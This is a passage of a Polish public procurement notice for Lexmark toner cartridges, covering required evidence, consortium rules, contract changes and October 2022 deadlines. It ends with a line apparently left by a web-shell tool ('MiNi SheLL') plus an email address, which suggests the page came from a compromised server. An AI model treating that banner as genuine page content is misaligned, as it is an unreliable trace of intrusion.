ich wartości, przedmiotu, dat wykonania / wykonywania i podmiotów, na rzecz których dostawy zostały wykonane/są wykonywane, w zakresie wymaganym w rozdziale IX ust. 1 pkt 3) Specyfikacji (Załącznik nr 5 do Specyfikacji). Do wykazu należy dołączyć dowody określające, czy usługi te zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy. W przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.<br/>UWAGA:<br/>W odniesieniu do warunku wskazanego w rozdziale IX ust. 1 pkt 3) Specyfikacji, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają dostawy, do realizacji których te zdolności są wymagane. W takiej sytuacji Wykonawca składa wraz z ofertą oświadczenie w zakresie wskazania, które dostawy wykonają poszczególni Wykonawcy (członkowie konsorcjum). Wzór oświadczenia stanowi Załącznik nr 4 do Specyfikacji.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Na potwierdzenie, że oferowane dostawy tonerów do urządzeń Lexmark MX611, Lexmark X654/T654 oraz Lexmark MS811 (poz. 1., 2. i 4. Formularza Ofertowego) spełniają określone przez Zamawiającego wymagania określone w opisie przedmiotu zamówienia zawartym w Specyfikacji, Zamawiający żąda – w odniesieniu do oferowanych oryginalnych i równoważnych tonerów – następujących przedmiotowych środków dowodowych:<br/>a)	kart charakterystyki produktu dotyczących bezpieczeństwa podczas kontaktu z niebezpiecznymi substancjami chemicznymi zgodne z Rozporządzeniem Komisji (UE) 2015/830 z dnia 28 maja 2015 r. zmieniającym Rozporządzenie (WE) nr 1907/2006 Parlamentu Europejskiego i Rady w sprawie rejestracji, oceny, udzielania zezwoleń i stosowanych ograniczeń w zakresie chemikaliów (REACH).<br/>Karty charakterystyki produktu sporządzone w języku obcym przekazuje się wraz z tłumaczeniem na język polski.<br/>b)	raportów z testów wydajności przeprowadzonych, zgodnie z normą ISO/IEC 19752 dla tonerów do drukarek lub urządzeń wielofunkcyjnych monochromatycznych lub normą równoważną, które powinny zawierać co najmniej poniższe informacje:<br/>˗	datę przeprowadzenia testu,<br/>˗	model urządzenia drukującego na którym przeprowadzono testy,<br/>˗	rodzaj testowanych materiałów (toner) ze wskazaniem ich oznaczenia,<br/>˗	liczba testowanych materiałów,<br/>˗	średnia wydajność testowanych materiałów (liczona w stronach na toner),<br/>˗	informacja o stronie testowej,<br/>˗	format i gramatura papieru używanego do testu,<br/>˗	dane kontaktowe do firmy, która przeprowadziła badania.<br/>Raporty sporządzone w języku obcym przekazuje się wraz z tłumaczeniem na język polski.<br/>c)	po 2 (dwie) sztuki każdego oferowanego tonera – w charakterze próbek. Zamawiający żąda dwóch próbek każdego z w/w tonerów w celu sprawdzenia czy zaoferowane tonery dają możliwość ich identyfikacji po unikatowym dla każdej sztuki numerze seryjnym oraz sprawdzenia ich wydajności i prawidłowości ich działania. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> a)	karty charakterystyki produktu dotyczących bezpieczeństwa podczas kontaktu z niebezpiecznymi substancjami chemicznymi zgodne z Rozporządzeniem Komisji (UE) 2015/830 z dnia 28 maja 2015 r. zmieniającym Rozporządzenie (WE) nr 1907/2006 Parlamentu Europejskiego i Rady w sprawie rejestracji, oceny, udzielania zezwoleń i stosowanych ograniczeń w zakresie chemikaliów (REACH).<br/>b)	raporty z testów wydajności przeprowadzonych, zgodnie z normą ISO/IEC 19752 dla tonerów do drukarek lub urządzeń wielofunkcyjnych monochromatycznych lub normą równoważną, które powinny zawierać co najmniej poniższe informacje:<br/>˗	datę przeprowadzenia testu,<br/>˗	model urządzenia drukującego na którym przeprowadzono testy,<br/>˗	rodzaj testowanych materiałów (toner) ze wskazaniem ich oznaczenia,<br/>˗	liczba testowanych materiałów,<br/>˗	średnia wydajność testowanych materiałów (liczona w stronach na toner),<br/>˗	informacja o stronie testowej,<br/>˗	format i gramatura papieru używanego do testu,<br/>˗	dane kontaktowe do firmy, która przeprowadziła badania.<br/>c)	po 2 (dwie) sztuki każdego oferowanego tonera – w charakterze próbek. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku:<br/>1)	każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia musi udokumentować, że nie podlega wykluczeniu z postępowania na podstawie przesłanek określonych w rozdziale VIII Specyfikacji, co oznacza, że każdy z Wykonawców składa oddzielnie oświadczenia stanowiące Załączniki nr 2 i 3 do Specyfikacji – zgodnie z art. 125 ust. 4 Ustawy,<br/>2)	muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego – zgodnie z art. 58 ust. 2 Ustawy,<br/>3)	przed podpisaniem umowy przedłożą pełnomocnictwo do zawarcia umowy w sprawie zamówienia publicznego, jeżeli pełnomocnictwo takie nie zostało dołączone do oferty.<br/>2.	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają świadczenia, do realizacji których te zdolności są wymagane. W takiej sytuacji, zgodnie z art. 117 ust. 4 Ustawy, Wykonawca składa wraz z ofertą oświadczenie w zakresie wskazania, które świadczenia wykonają poszczególni Wykonawcy (członkowie konsorcjum). Wzór oświadczenia stanowi Załącznik nr 4 do Specyfikacji. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Oprócz zmian dopuszczalnych Ustawą (art. 455 Ustawy) Zamawiający przewiduje zmiany określone poniżej:<br/>1)	działanie siły wyższej uniemożliwiającej wykonanie przedmiotu Umowy zgodnie z jej postanowieniami,<br/>2)	zmiana sposobu realizacji przedmiotu Umowy wynikającej ze zmian w obowiązujących przepisach prawa mających wpływ na realizację przedmiotu Umowy,<br/>3)	okoliczności związanych z wystąpieniem COVID – 19 mających wpływ na należyte wykonanie Umowy – art. 15r oraz art. 15r1 ustawy o COVID – 19,<br/>4)	zmiany danych identyfikujących Strony Umowy,<br/>5)	zmian mających na celu doprecyzowanie zapisów w treści Umowy, jeśli będą budziły wątpliwości interpretacyjne między Stronami,<br/>6)	zmiany podwykonawcy,<br/>7)	redakcyjne omyłki pisarskie.<br/>2.	Zmiana Umowy nastąpi w formie pisemnego Aneksu do Umowy pod rygorem nieważności, z zastrzeżeniem § 10 ust. 5 Umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-10-07 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/arimr</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-10-07 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Pozycja planu zamówień publicznych nr 1.2.21

Creat By MiNi SheLL
Email: jattceo@gmail.com